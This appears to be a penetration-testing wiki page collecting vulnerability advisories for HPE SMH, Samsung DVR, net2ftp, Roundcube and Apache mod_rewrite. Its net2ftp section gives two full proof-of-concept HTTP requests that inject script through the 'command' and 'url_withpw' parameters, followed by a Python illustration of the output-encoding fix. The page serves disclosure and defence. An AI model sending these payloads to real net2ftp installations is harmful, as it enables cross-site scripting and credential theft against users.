Category: advisory

Penetration Testing Wiki

HPE SMH XSS DOM-Based Advisory

Product: HPE System Management Homepage
Versions: ALL versions and platforms affected (Tested on v7.6.0.11 for MS Windows)
Vulnerability: JavaScript Injection in file gsearch.php, parameter prod
OWASP TOP 10: A1 Injection
Type: JavaScript Injection
Impact: Allows an attacker to perform a DOM-based XSS (Cross-Site Scripting) attack, execute arbitrary JavaScript client-side, steal admin credentials, etc.
Access Vector: Adjacent Networks
Access Complexity: Low
Authentication: None
CVE: CVE-2017-12544…

CVE-2017-12544 Hewlett Packard Enterprise, HP System Management Homepage Software prior to 7.6.1 Cross-site Scripting (XSS)

The HP System Management Homepage (SMH) is a web-based interface that consolidates and simplifies the management of ProLiant and Integrity servers running Microsoft Windows or Linux, or HP 9000 and HP Integrity servers running HP-UX 11i.

HPE security bulletin: https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
Original Advisory: https://www.securityfocus.com/archive/1/541823/30/0/threaded

Google dork for iDC File Manager

iDC File Manager is a secure multi-user web-based File Management System that allows you to store, manage and share every format of digital media, including documents, images, audio, video, publishing layouts, presentations and PDF files, between you and your end users. If your company has a requirement to distribute or share files with…

CVE-2016-10113 I got my first CVE!

Samsung DVR Web Viewer weak credentials

On January 4th 2017 MITRE assigned me CVE-2016-10113 for reporting this vulnerability. Samsung DVR Web Viewer uses HTTP (port 80) by default and transmits the credentials encoded in the Cookie header, which is very bad security practice: the login and password are merely Base64-encoded. It is trivial…

[0day] net2ftp multiple XSS on unauthenticated users

Summary

Subject: net2ftp XSS in “command” and “url_withpw” parameters
Versions vulnerable: ALL (Tested on latest, version 1.0)
Category: 0-day
Impact: Medium

Description of the product

net2ftp is a web based FTP client (http://www.net2ftp.com/index.php). It can be used as a standalone version and is also integrated in some web platforms such as ISP providers, e-commerce sites and other websites.

Description of the vulnerabilities

While doing vulnerability research on net2ftp, latest version 1.0, Jacobo Avariento found several cross-site scripting (XSS) issues: in skins/shinra/bookmark1.template.php (line 18) via the “url_withpw” parameter, and in skins/shinra/raw1.template.php (line 5) via the “command” parameter. The first, parameter “url_withpw”, is triggered when the user places a bookmark on that FTP connection. The second, parameter “command”, is triggered when the user accesses the FTP interactive mode used to send arbitrary FTP commands to the server.

Proof of concept

XSS in parameter “command”

POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php
Cookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmf
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 391

ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&sort=&sortorder=&state=raw&state2=main&directory=%2F&screen=&command=CWD+%0D%0APWD%0D%0A%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E&text=501+Invalid+number+of+arguments%0D%0A257+%22%2F%22+is+the+current+directory%0D%0A

XSS in parameter “url_withpw”

POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php
Cookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmf
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1141

ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&sort=&sortorder=&state=bookmark&state2=main&directory=%2F&url_withpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bpassword_encrypted%3D%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Draw%26amp%3Bstate2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D%22%3C%2Fa%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E&url_withoutpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Dlogin_small%26amp%3Bstate2%3Dbookmark%26amp%3Bgo_to_state%3Draw%26amp%3Bgo_to_state2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D&text=net2ftp+192.168.1.103

Impact

Due to a possible lack of validation of cookie and session parameters it is possible to trigger the attacks directly, without needing to log in to the server or the website. Because of these circumstances the risk of the vulnerability is rated as “medium”: no authentication is required and it can be triggered on any net2ftp installation online. It has been verified that several ISP providers use this software for their clients, among other customers.

Timeline

Jul 24/2016: The vendor has already been contacted; no reply until the date of public disclosure.

Further Actions

We recommend all sysadmins and web developers who are using net2ftp software to review the files skins/shinra/bookmark1.template.php and skins/shinra/raw1.template.php manually and patch the XSS, because no official patches are released or planned yet.
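The patch the advisory asks for is output encoding that matches the HTML context each parameter lands in: “command” is reflected as textarea text, “url_withpw” inside a quoted link attribute. The Python below is an added illustration, not net2ftp’s code: it decodes the two PoC parameters, places them in an assumed unsafe template shape and in a hardened one, and checks that the injected script survives only the former. The template shapes and the shortened sample bodies are constructed.

```python
import html
from urllib.parse import parse_qs

# Constructed sample bodies: the "command" and "url_withpw" values are the
# URL-encoded values from the advisory's PoC requests, other fields trimmed.
POC_COMMAND_BODY = ("state=raw&command=CWD+%0D%0APWD%0D%0A%3C%2Ftextarea%3E"
                    "%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E")
POC_BOOKMARK_BODY = ("state=bookmark&url_withpw=%2Findex.php%3Fentry%3D%22"
                     "%3C%2Fa%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E")


def param(body: str, name: str) -> str:
    """Return one parameter of an application/x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


# --- Unsafe rendering: an assumed template shape, NOT net2ftp's own code ---
def render_command_unsafe(command: str) -> str:
    return f'<textarea name="command">{command}</textarea>'


def render_bookmark_unsafe(url_withpw: str) -> str:
    return f'<a href="{url_withpw}">bookmark</a>'


# --- Hardened rendering: encode for the context the value is placed in ---
def render_command_safe(command: str) -> str:
    # Element text: '<' becomes '&lt;', so '</textarea>' can no longer close
    # the element and '<script>' is shown literally instead of parsed.
    return f'<textarea name="command">{html.escape(command, quote=False)}</textarea>'


def render_bookmark_safe(url_withpw: str) -> str:
    # Double-quoted attribute: '"' becomes '&quot;', so the value cannot end
    # the attribute; '<' and '>' are encoded as well.
    return f'<a href="{html.escape(url_withpw, quote=True)}">bookmark</a>'


def injected_script(rendered: str) -> bool:
    """Check used to compare the two renderings: is a <script> tag present?"""
    return "<script" in rendered.lower()
```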

Vpopmail/QmailAdmin Multiple Integer Overflows

Author: Jacobo Avariento Gimeno
Release Date: May 8, 2009
CVE/bugtraq id: Not assigned yet
Severity: Low/Medium

Vendor’s Description of Software:
“Vpopmail is a free GPL package developed by Inter7 to provide an easy way to manage virtual email domains and non /etc/passwd email accounts for qmail or postfix mail servers.” [1]
“qmailAdmin is a free software package that provides…

CVE-2008-5619 Roundcube Webmail 0.2 Remote Code Execution

Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy

Intro

Roundcube Webmail is a browser-based IMAP client that uses the “chuggnutt.com HTML to Plain Text Conversion” library to convert HTML text to plain text; this library uses the preg_replace PHP function in an insecure manner.

Vulnerable versions

RoundCube Webmail…

Exploit & info about off-by-one overflow in mod_rewrite module of Apache HTTP server

CVE-2006-3747 POC & exploit for Apache 1.3/2.0/2.2 mod_rewrite off-by-one, SecurityFocus https://www.securityfocus.com/archive/1/443870

Vulnerable Apache Versions

1.3 branch: >1.3.28 and <1.3.37
2.0 branch: >2.0.46 and <2.0.59
2.2 branch: >2.2.0 and <2.2.3

However, due to the sensitive nature of off-by-one exploitation, not all the vulnerable versions are exploitable ones. I did a successful attack on Apache 1.3.34…